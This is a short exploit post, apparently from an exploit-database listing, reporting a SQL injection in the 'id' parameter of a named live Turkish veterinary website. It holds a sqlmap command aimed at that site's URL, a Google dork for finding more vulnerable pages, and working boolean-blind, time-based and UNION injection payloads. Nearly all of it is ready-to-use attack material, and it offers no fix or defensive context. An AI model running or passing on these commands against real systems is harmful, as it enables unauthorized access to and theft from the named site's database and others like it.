****************************
#Exploit Title: VETERINER - SQL Injection vulnerability
#Date: 2020-08-16
#Exploit Author: Mahdi Karimi
#Vendor Homepage: veteriner.org.tr
#Google Dork: home.php?id=
#Tested On: windows 10
sqlmap:
sqlmap -u "veteriner.org.tr/tr/manset.php?id=46" --level=5 --risk=3 --random-agent
Testing Method;
- time-based blind
- boolean-based blind
- UNION query
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-1858 OR 4229=4229
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=46 AND (SELECT 7912 FROM (SELECT(SLEEP(5)))JaaR)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=46 UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x7a545771586269526e74736b677249786445454f6e4f6d6b457656755658726d6b5676545265416c,0x7178706b71),NULL,NULL-- -
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************